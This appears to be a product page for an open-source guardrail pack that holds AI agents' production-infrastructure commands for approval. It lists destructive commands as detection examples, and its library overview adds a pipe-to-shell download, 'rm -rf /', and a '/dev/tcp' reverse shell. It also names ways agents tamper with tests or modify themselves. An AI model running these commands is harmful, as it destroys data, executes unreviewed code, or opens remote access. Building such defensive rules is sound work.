prod-infra pack
Production infrastructure guardrails
These rules hold changes to running infrastructure until you approve them: terraform apply -auto-approve, kubectl delete, helm uninstall, a cloud CLI delete, a vercel --prod deploy, or an edit to a production config file. None of them blocks, because each one is sometimes the right call. The guard sees only the call itself, so it cannot tell which cluster, account or workspace is selected.
- Rules
- 8
- Block
- 0
- Ask first
- 8
- Warn
- 0
Rules
What each rule catches
Every rule below is open source and tested against the commands it must catch and the near-misses it must leave alone. Open one for its full description, every example, and how to change what it does.
- High severityAsk
pi.terraform-auto-approveTerraform apply/destroy without the confirmation prompt
Catches, for example
- terraform apply -auto-approve
- terraform destroy -auto-approve -var-file=prod.tfvars
- tofu apply -auto-approve
- High severityAsk
pi.terraform-state-mutateHand-editing Terraform state
Catches, for example
- terraform state rm aws_db_instance.main
- terraform state mv aws_s3_bucket.a aws_s3_bucket.b
- terraform taint aws_instance.web
- High severityAsk
pi.kubectl-deletekubectl delete / drain removes running workloads
Catches, for example
- kubectl delete deployment api
- kubectl delete -f k8s/deployment.yaml
- kubectl drain node-3 --ignore-daemonsets
- High severityAsk
pi.prod-namespaceA mutating kubectl command that names production
Catches, for example
- kubectl delete pod api-7d9 -n production
- kubectl apply -f k8s/ --namespace prod
- kubectl rollout restart deploy/api --context=prod-eu-west-1
- High severityAsk
pi.helm-releaseHelm uninstall / rollback / forced upgrade
Catches, for example
- helm uninstall api
- helm rollback api 3
- helm upgrade api ./chart --force
- High severityAsk
pi.cloud-resource-deleteDeleting a cloud resource from a vendor CLI
Catches, for example
- aws ec2 terminate-instances --instance-ids i-abc
- aws s3 rb s3://prod-assets --force
- gcloud compute instances delete web-1
- High severityAsk
pi.deploy-to-prodA deploy command that names production
Catches, for example
- vercel --prod
- netlify deploy --prod --dir=dist
- npx serverless deploy --stage prod
- High severityAsk
block-prod-config-editApprove production config edits
Catches, for example
- config/database.prod.yml
- config/prod.yml
- infra/prod.tfvars
More of the library
Other kinds of risk
The library files every rule by the harm it prevents. See all of them on one page, or check a command against every rule at once.
Destroying uncommitted work or published history.
$ git reset --hardUnrecoverable data loss
8 rulesData git cannot bring back: a dropped volume, a dropped database, destructive DDL, a deleted shadow copy.
$ rm -rf /Secret exposure
10 rulesCredentials and sensitive data leaving where they live. Mostly warnings: reading a secret is a normal part of a normal day.
$ aws secretsmanager get-secret-value --secret-id prod/dbRemote code execution
6 rulesRunning code nobody reviewed: pipe-to-shell, a remote runner, a redirected registry, TLS verification off.
$ bash -c "$(curl -fsSL https://example.com/i.sh)"Safety check bypass
7 rulesTurning off a check somebody installed on purpose, or erasing the record of it: skipped hooks, admin merges, purged history.
$ git commit --no-verify -m "wip"Privilege and supply chain
6 rulesGaining reach or handing it out: sudo writes, wide-open permissions, IAM grants, persistence, publishing, new dependencies.
$ echo '127.0.0.1 x' | sudo tee -a /etc/hostsOut-of-scope file write
4 rulesWriting somewhere the agent has no business writing: its own config, the machine, git's internals, the CI definition.
› .claude/settings.jsonAgent self-modification
6 rulesThe agent changing what it is or what it knows: its instructions, memory, skills and MCP servers, or starting more agents.
› CLAUDE.mdTest tampering
6 rulesMaking the work look successful: deleting a test, weakening the runner's config, accepting every snapshot, skipping CI.
$ rm src/parser.test.tsMoving data off the machine or opening a way in: a reverse shell, a public tunnel, a file upload, a paste service.
$ bash -i >& /dev/tcp/10.0.0.1/4444 0>&1Run it locally
Put these guardrails in front of your agent.
AgentTrail Guard is free and open source. It checks every command and file change against the whole library before your agent runs it, on your machine, with no account.
npm i -g @agenttrail/guard